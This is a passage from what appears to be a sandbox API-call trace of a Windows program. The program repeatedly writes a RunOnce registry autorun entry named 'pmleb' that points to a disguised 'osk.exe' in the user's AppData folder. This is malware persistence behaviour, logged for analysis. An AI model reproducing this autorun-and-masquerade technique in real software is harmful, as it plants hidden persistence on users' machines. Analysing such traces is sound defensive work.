phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.974] RegCloseKey (hKey=0x280) returned 0x0 [0098.974] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.974] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.974] SetTimer (hWnd=0x20280, nIDEvent=0x2303, uElapse=0xa, lpTimerFunc=0x0) returned 0x2303 [0098.974] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0098.994] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0098.994] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0098.995] KillTimer (hWnd=0x20280, uIDEvent=0x2303) returned 1 [0098.995] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.995] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0098.995] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0098.995] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0098.996] RegCloseKey (hKey=0x280) returned 0x0 [0098.996] IUnknown:Release (This=0x7a9740) returned 0x1 [0098.996] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0098.996] SetTimer (hWnd=0x20280, nIDEvent=0x2304, uElapse=0xa, lpTimerFunc=0x0) returned 0x2304 [0098.996] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.003] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.003] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.004] KillTimer (hWnd=0x20280, uIDEvent=0x2304) returned 1 [0099.005] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.007] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.007] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.008] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.008] RegCloseKey (hKey=0x280) returned 0x0 [0099.008] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.009] SetTimer (hWnd=0x20280, nIDEvent=0x2305, uElapse=0xa, lpTimerFunc=0x0) returned 0x2305 [0099.009] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.021] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.021] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.021] KillTimer (hWnd=0x20280, uIDEvent=0x2305) returned 1 [0099.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.043] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.043] RegCloseKey (hKey=0x280) returned 0x0 [0099.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.043] SetTimer (hWnd=0x20280, nIDEvent=0x2306, uElapse=0xa, lpTimerFunc=0x0) returned 0x2306 [0099.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.058] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.058] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.058] KillTimer (hWnd=0x20280, uIDEvent=0x2306) returned 1 [0099.059] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.059] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.059] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.059] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.060] RegCloseKey (hKey=0x280) returned 0x0 [0099.060] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.060] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.060] SetTimer (hWnd=0x20280, nIDEvent=0x2307, uElapse=0xa, lpTimerFunc=0x0) returned 0x2307 [0099.060] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.065] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.066] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.066] KillTimer (hWnd=0x20280, uIDEvent=0x2307) returned 1 [0099.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.066] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.066] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.067] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.067] RegCloseKey (hKey=0x280) returned 0x0 [0099.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.067] SetTimer (hWnd=0x20280, nIDEvent=0x2308, uElapse=0xa, lpTimerFunc=0x0) returned 0x2308 [0099.067] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.081] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.081] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.082] KillTimer (hWnd=0x20280, uIDEvent=0x2308) returned 1 [0099.083] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.083] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.083] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.083] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.083] RegCloseKey (hKey=0x280) returned 0x0 [0099.083] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.084] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.084] SetTimer (hWnd=0x20280, nIDEvent=0x2309, uElapse=0xa, lpTimerFunc=0x0) returned 0x2309 [0099.084] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.097] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.097] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.097] KillTimer (hWnd=0x20280, uIDEvent=0x2309) returned 1 [0099.097] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.098] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.098] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.098] RegCloseKey (hKey=0x280) returned 0x0 [0099.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.098] SetTimer (hWnd=0x20280, nIDEvent=0x230a, uElapse=0xa, lpTimerFunc=0x0) returned 0x230a [0099.098] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.112] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.112] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.113] KillTimer (hWnd=0x20280, uIDEvent=0x230a) returned 1 [0099.113] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.113] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.114] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.115] RegCloseKey (hKey=0x280) returned 0x0 [0099.115] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.115] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.115] SetTimer (hWnd=0x20280, nIDEvent=0x230b, uElapse=0xa, lpTimerFunc=0x0) returned 0x230b [0099.115] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.128] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.128] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.128] KillTimer (hWnd=0x20280, uIDEvent=0x230b) returned 1 [0099.128] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.129] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.129] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.129] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.129] RegCloseKey (hKey=0x280) returned 0x0 [0099.129] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.129] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.129] SetTimer (hWnd=0x20280, nIDEvent=0x230c, uElapse=0xa, lpTimerFunc=0x0) returned 0x230c [0099.129] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.143] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.143] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.144] KillTimer (hWnd=0x20280, uIDEvent=0x230c) returned 1 [0099.144] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.144] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.145] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.145] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.145] RegCloseKey (hKey=0x280) returned 0x0 [0099.145] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.145] SetTimer (hWnd=0x20280, nIDEvent=0x230d, uElapse=0xa, lpTimerFunc=0x0) returned 0x230d [0099.145] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.160] KillTimer (hWnd=0x20280, uIDEvent=0x230d) returned 1 [0099.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.161] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.161] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.161] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.161] RegCloseKey (hKey=0x280) returned 0x0 [0099.161] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.161] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.161] SetTimer (hWnd=0x20280, nIDEvent=0x230e, uElapse=0xa, lpTimerFunc=0x0) returned 0x230e [0099.161] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.175] KillTimer (hWnd=0x20280, uIDEvent=0x230e) returned 1 [0099.175] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.176] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.176] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.176] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.176] RegCloseKey (hKey=0x280) returned 0x0 [0099.176] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.177] SetTimer (hWnd=0x20280, nIDEvent=0x230f, uElapse=0xa, lpTimerFunc=0x0) returned 0x230f [0099.177] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.190] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.190] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.190] KillTimer (hWnd=0x20280, uIDEvent=0x230f) returned 1 [0099.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.191] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.191] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.192] RegCloseKey (hKey=0x280) returned 0x0 [0099.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.192] SetTimer (hWnd=0x20280, nIDEvent=0x2310, uElapse=0xa, lpTimerFunc=0x0) returned 0x2310 [0099.192] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.206] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.206] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.206] KillTimer (hWnd=0x20280, uIDEvent=0x2310) returned 1 [0099.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.207] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.207] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.207] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.207] RegCloseKey (hKey=0x280) returned 0x0 [0099.208] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.208] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.208] SetTimer (hWnd=0x20280, nIDEvent=0x2311, uElapse=0xa, lpTimerFunc=0x0) returned 0x2311 [0099.208] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.222] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.222] KillTimer (hWnd=0x20280, uIDEvent=0x2311) returned 1 [0099.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.223] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.223] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.223] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.223] RegCloseKey (hKey=0x280) returned 0x0 [0099.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.224] SetTimer (hWnd=0x20280, nIDEvent=0x2312, uElapse=0xa, lpTimerFunc=0x0) returned 0x2312 [0099.224] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.249] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.249] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.250] KillTimer (hWnd=0x20280, uIDEvent=0x2312) returned 1 [0099.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.250] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.250] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.251] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.251] RegCloseKey (hKey=0x280) returned 0x0 [0099.251] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.251] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.251] SetTimer (hWnd=0x20280, nIDEvent=0x2313, uElapse=0xa, lpTimerFunc=0x0) returned 0x2313 [0099.251] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.253] KillTimer (hWnd=0x20280, uIDEvent=0x2313) returned 1 [0099.253] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.253] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.253] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.254] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.254] RegCloseKey (hKey=0x280) returned 0x0 [0099.254] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.254] SetTimer (hWnd=0x20280, nIDEvent=0x2314, uElapse=0xa, lpTimerFunc=0x0) returned 0x2314 [0099.254] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0099.268] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0099.268] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0099.269] KillTimer (hWnd=0x20280, uIDEvent=0x2314) returned 1 [0099.271] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.272] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0099.272] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0099.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0099.278] RegCloseKey (hKey=0x280) returned 0x0 [0099.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0099.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0099.278] SetTimer (hWnd=0x20280, nIDEvent=0x2315, uElapse=0xa, lpTimerFunc=0x0) returned 0x2315 [0099.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 